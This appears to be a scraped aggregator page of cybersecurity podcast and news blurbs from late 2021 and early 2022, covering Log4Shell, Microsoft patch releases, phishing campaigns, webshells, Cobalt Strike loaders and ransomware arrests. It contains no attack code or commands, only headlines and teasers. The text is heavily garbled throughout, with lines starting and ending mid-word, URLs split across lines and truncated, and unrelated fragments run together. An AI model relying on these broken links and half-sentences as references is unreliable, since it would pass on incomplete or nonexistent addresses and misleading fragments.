Phishing E-Mail With an Advertisement
/ Virustotal Credential https://www.safebreach.co
yber-crime/ Oracle Quarterly Critical Patch Update https://www.or ...
Picture of the Week "Hack the Pentagon" with Log4j Open Source Software Security Summit Microsoft's January Patch Tuesday Review: The GOOD News Microsoft's January Patch Tuesday Review: The Not So Good News Check Your Router Firmware Updates Chrome to Imp ...
Researchers at browser identification company FingerprintJS recently found and disclosed a fascinating data leakage bug in Apple’s web browser software. Technically, the bug exists in Apple’s open source WebKit “browser engine”, which means it aff ...
1.1 Intro I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however ...
Log4Shell Attacks Getting Smarter
Microsoft Releases Special Update to Deal with January Update Fail https://www.bleepingcompu
Found love online? Sending them money? Friends and family warning you it could be a scam? Don't be too quick to dismiss their concerns...
This month Chris Hadnagy and Ryan MacDougall are joined by John Strand from Black Hills Information Security. John has both consulted and taught hundreds of organizations in the areas of security, regulatory compliance, and penetration testing. He is ...
Use of Alternate Data Streams in Research Scans
/ Microsoft Resumes Windows Server 2019 Cumulative Updates https://www.bleepingcompu
This is a special edition of Social-Engineer's Human Element Series Podcast. Chris Hadnagy will discuss Covid-19 testing site scams, and how you can protect yourself against them. [January 14, 2022] 00:00 – Intro social-engineer.com/ social-engine ...
Imagine if someone who didn't have your password could sneakily modify data that was encrypted with it.
The Russian Federal Security Bureau has just published a report about the investigation and arrest of the infamous "REvil" ransomware crew.
MSFT Patch Issues
In this edition of the soap box we’re chatting with Steve Miller, the head of threat intelligence at Stairwell. Steve has a long history doing this sort of stuff. He worked inside various bits of the US government doing cyber things, and also spent a de ...
In this edition of the soap box we’re chatting with Steve Miller, a senior researcher at Stairwell. Steve has a long history doing this sort of stuff. He worked inside various bits of the US government doing cyber things, and also spent a decent chunk o ...
Latest episode -listen to it or read it now!
I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizati ...
A Quick CVE-2022-21907 FAQ
/28234/ Details Released Regarding Patched Sonicwall Vulnerabilities https://www.rapid7.com/bl
One bug in the January 2022 Patch Tuesday list is getting lots of attention: "HTTP Protocol Stack Remote Code Execution Vulnerability".
Microsoft Patch Tuesday - January 2022
0/ Adobe Updates https://helpx.adobe.com/s
Picture of the Week. The US CISA Log4J status update. The H2 Database Console vulnerability. The Federal Trade Commission gets into the act! Chrome fixed 37 known problems last week. The Privacy-first Brave browser. WordPress 5.8.3 security update. What, ...
On this week’s show Patrick Gray, Katie Nickels and Joe Slowik discuss the week’s security news, including: US Government warns of impending critical infrastructure hacks Log4j bug in VMWare gets a workout Ex Uber CSO Joe Sullivan facing wire ...
Got a router that supports USB access across the network? You might need a kernel update...
I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why emai ...
New MacOS Vulnerability Could Lead to Unauthorized User Data Access
ss Exploiting URL Parsers https://claroty.com/wp-co
This month Chris Hadnagy is joined by the fascinating Amy Herman. Amy is a lawyer and an art historian who uses works of art to sharpen observation, analysis, and communication skills. She developed her Art of Perception seminar in 2000 and since then ha ...
Extracting Cobalt Strike Beacons from MSBuild Scripts
uild+Scripts/28200/ The JNDI Strikes Back: Unauthenticated RCE in H2 Database Console https://jfrog.com/blog/th
Where were YOU on the night of 17 May 2002? And what about the day after that?
"It's Log4Shell, Jim, but not as we know it." How to find and fix a JNDI-based vuln in the H2 Database Engine.
Malicious Python Script Targeting Chinese People
+People/28220/ Google Docs Comment Exploit Allows for Distribution of Phishing and Malware https://www.avanan.com/bl
1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVEs 2021-42287 and 2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the ...
We're back for 2022 - listen now!
Code Reuse in the Malware Landscape
/ ZLoader Campaign Exploiting Signature Verification Bug https://research.checkpoi
Remember the Equifax breach? Remember the $700m penalty? In case you'd forgotten, here's the FTC to refresh your memory!
A Simple Batch File That Blocks People
212/ Windows Server Remote Desktop Emergency Update https://docs.microsoft.co
ter#2772 Mal ...
Picture of the Week. Log4j's 5th update. Microsoft's Log4j scanner triggers false positives. Chinese government is annoyed with Alibaba. "Hack the DHS" Bug Bounty Expanded. COVID postpones the RSA Conference. DuckDuckGo continues to grow. The cost of cybe ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: The log4j bug wrap The ransomware wrap The human rights and surveillance industry wrap Research and carnage wrap This week’s show is brought t ...
The finder of this bug insists it "poses a serious risk". We're not so sure, but we recommend you take steps to avoid it anyway.
McAfee Phishing Campaign with a Nice Fake Scanhttps://isc.sans.edu/
Fake+Scan/28208/ Trend Micro Apex One Patchhttps://success.tren
9996 E-commerce Bots Using Cheap Domain Registrati ...
Exchange Server Year 2022 Bughttps://isc.sans.edu/f
ues/ba-p/3049447 Agent Tesla ...
We deconstructed a copyright phish so you don't have to. Be warned: the crooks are getting better at these scams...
Log4j 2 Security Vulnerabilities Update Guidehttps://isc.sans.edu
t Defender Log4j False Positiveshttps://www.blee
It's a Log4j bug, and you ought to patch it. But we don't think it's a critical crisis like the last one.
Log4j Vulnerablity CVE-2021-44832https://log
4832 LotL Classifiershttps://isc.sa
/ LastPass Credential Stuffinghttps://www.bleep
Leo Laporte walks through some of the highlights of the show and most impactful stories of 2021. Stories include: SolarWinds Hack Detailed By Microsoft Crispy Subtitles from Lay's Remembering Dan Kaminsky REvil Hacks Apple Supplier Quanta Computer The "D ...
Attackers are Abusing MSBuild to Evade Defenses and Implant Cobalt Strike Beaconshttps://isc.sans.e
180/ Bypassing File Quarantine, Gatekeeper and Notarizat ...
Log4j/Log4Shell and Cloud Internal Meta Data Serviceshttps://isc.sans.
Happy Holidays! Our Top N stories, all totally SFW!
You know you want one, because this retro phone is NOT A TOY... except when it comes to cybersecurity.
Forensics Challenge Solutionhttps://isc.sans.
lume COVID Home Test Weak ...
Phew! An audacious crime... that didn't work out.
More Undetected PowerShell Droppershttps://isc.sans.
r/28158/ Apache Patcheshttps://httpd.apac
lities_24.html Auerswald COMpact Multiple Backdoorshttps://www.redt
Picture of the Week. Google's 16th exploited Chrome 0-day of the year. Firefox refuses to do Microsoft.com! Firefox disabled Microsoft's Cloud Clipboard. Weaknesses in all cellular networks since 2G. Cross Wi-Fi / Bluetooth leakage. "The Matrix Resurrecti ...
The Apache web server just got an update - this one is nothing to do with Log4j!
PowerPoint Atachments: Agent Tesla and Code Reuse in Malwarehttps://isc.sans.e
e/28154/ VMWare Workspace ONE Patch / log4j statushttps://www.vmware.
tml Atta ...
Be happy that your sysadmins are taking one (three, actually!) for the team right now... here's why!
This month, Chris Hadnagy and Ryan MacDougall are joined by Adam Levin. Adam is a nationally recognized expert on cybersecurity, privacy, identity theft, fraud, and personal finance and has distinguished himself as a fierce consumer advocate for the p ...
Disaster Recovery Automation Using Public DNS APIshttps://isc.sans.edu/
8146/ Office 2021: VBA Project Versionhttps://isc.sans.e
150/ Log4j Updateshttps://ww ...
Have you ever seen the message "An error occurred"? Even worse, the message "This error cannot occur"? Facts matter!
How the "Contact Forms" Campaign Tricks Peoplehttps://isc.sans.ed
h Used to Extract WiFi Secretshttps://arxiv.org/
pdf/2112.05719.pdf Lenovo Privilege Escalation Vulnerabilityhttps:/ ...
Latest episode - listen now! (Yes, there are plenty of critical things to go along with Log4Shell.)
Undetected Powershell Backdoorhttps://isc.sans.
Backdoor/28138/ Adobe Security Updateshttps://helpx.adob
e Deserialization Bug in Microsoft RDP Client Through Smart Card Extensionhtt ...
day/28132/ Log4j Updateshttps://isc.sans.e
enough/28134/ Log4j Scannerhttps://github.com
Picture of the Week.
Amazon outage and cloud dependence.
Windows 11 vs Your Browser of Choice.
WordPress once again in the crosshairs.
Closing the Loop.
og4j & Log4Shell. We invite you to read our show notes at https://www ...
Get 'em while they're hot!
Log4Shell Becoming Part of the Day to Day Grindhttps://isc.sans.edu
B5D3Ys Google Chrome Updatehttps://chromerelea
On December 09, 2021, a severe vulnerability for Apache Log4j was released (CVE-2021-44228). This vulnerability, also known as Log4Shell, allows remote code execution in many applications through web requests and without authentication. Almost immediately ...
This month Chris Hadnagy is joined by our good friend, Anne-Maartje Oud. For 20 years Anne-Maartje has been a behavioral advisor, consultant, chairwoman, and keynote speaker. On top of that she is the CEO and founder of The Behavior Company based in Amste ...
Remote Code Execution in log4j2https://isc.sans.ed
20/ Log4j Zero Dayhttps://www.lunasec.io
/ Log4j2/Log4Shell Followup: What we see and how to defend and ho ...
Find out how to deal with the Log2Shell vulnerability right across your estate. Yes, you need to patch, but that helps everyone else along with you!
Just when you thought it was safe to relax for the weekend... a critical bug showed up in Apache's Log4j product
Phishing Direct Messages via Discordhttps://isc.sans.e
rd/28114/ Vulnerable Microtik Routershttps://eclypsium.
ts/ log4j RCE 0-dayhttps://www.lunasec.
This isn’t the normal weekly news episode of the show, if you’re looking for the regular weekly Risky Business podcast, scroll one back in your podcast feed. This is a Soap Box edition, a wholly sponsored podcast brought to you in this instance by Thi ...
Listen now or read as an article! (Full transcript inside.)
Intro I was at my local Target recently and spotted the section near the video games, where there were some little collectable arcade systems and handhelds that play games like Pac-Man, Galaga, and Contra. Figure 1 – Target Arcade Games and Handhe ...
December 2021 Forensic Challengehttps://isc.sans
/28108/ Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attackshttps://www.proofp
Webshells, Webshells everywhere!https://isc.sa
/28106/ AWS Outagehttps://status.aws.
amazon.com Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposedhttps://spectralop
Picture of the Week. Tavis finds a bad bug in NSS. Cheap Smartwatches for kids and babies? Additional VPN vendors just say no to Roskomnadzor! Windows 11 loosens its grip on Edge. RTF Templates being used to inject malicious content. A Malicious Botnet us ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: NSO Group tools found on US embassy staff phones in Uganda Mitto is up to shady bidnez Ubiquiti “whistleblower” charged over hack Hounds everywhe ...
Firefox 95.0 is out, with the usual security fixes... plus some funky new ones.
The Importance of Out of Band Networkshttps://isc.sans.
rks/28102/ Kaseya Unitrends Backup Appliance Updateshttps://helpdesk.k
es/4412762258961 Is KAX17 Performing De-Anonymization A ...
Think of a number, any number. Take away 42. Add 42 back in. Then pretend you didn't take away 42. How much is left?
The UPX Packer will never diehttps://isc.sans.edu/f
urvey of Airgap Attackshttps://www.welive
ity Victim of Insider Extortionhttps:/ ...
Mozilla's cryptographic code had a critical bug. Problem is that numerous apps are affected and may need patching individually.
TA551 (Shathak) Pushes IcedID (Bokbot)https://isc.sans.
t/28092/ pip-audit scanning Python packages for known vulnerabilitieshttps://py
Wifi Router Flawshttps://www.iot-insp
Latest episode - listen now!
"Must be at least THIS tall to go on ride" seems to be the starting point. Too little, too late? Or better than nothing?
Info-Stealer Using webhook.site to Exfiltrate Datahttps://isc.sans.edu/
a NSS Library Vulnerabilityhttps://bugs
EwDoor Botnet is At ...
Hunting for PHPUnit Installed via Composerhttps://isc.sans.
t Defender Scares Admins with Emotet False Positivieshttps://www.ble
Picture of the Week. "Super Duper Secure Mode" 37% of the world's smartphones are vulnerable. The RAT Dispenser. The Entirely Predictable 0-Day Windows Exploit. "The Frontiers Saga: Fringe Worlds" Closing the Loop. Bogons Begone! We invite you to read our ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: Israel slashes number of countries it will export cyber tools to Interpol takes down 1,000 Internet fraudsters Ransomware crews lying low? When the t ...
Scraping data for a facial recognition service? "That's unlawful", concluded both the British and the Australians.
Wireshark 3.6.0 Releasedhttps://isc.sans.
gle Cloud Security Reporthttps://services.go
v2021.pdf Zoom Patchhttps://explore.zoom
Phishing Pages Hiding Itself Using Dynamically Adjusted IP Based Allow Listhttps://isc.sans.edu/
ot Phishing Checks Screen Resolution to Evade Researchersht ...
Cloud security is the best sort of altruism: you need to do it to protect yourself, but you help to protect everyone else at the same time.
Latest episode - listen now! Solid cybersecurity advice in plain English.
Those numbers that show up on your phone to tell you who's calling? Treat them as SUGGESTIONS, never as PROOF.
YARA Rule for OOXML Maldocs: Less False Positiveshttps://isc.sans
ero-Day Windows Installer Exploithttps://www.bleepi
Picture of the Week. An idea whose time has passed... The stats of brute force password attacks. The Most Common Passwords. GoDaddy Breached Bigtime! A heads-up about NetGear routers. HTTP Request Smuggling. We invite you to read our show notes at https:/ ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: Apple sues NSO Group and it’s all a bit weird Israel charges defence minister’s house cleaner with Iranian hacker collusion (really) USA charges tw ...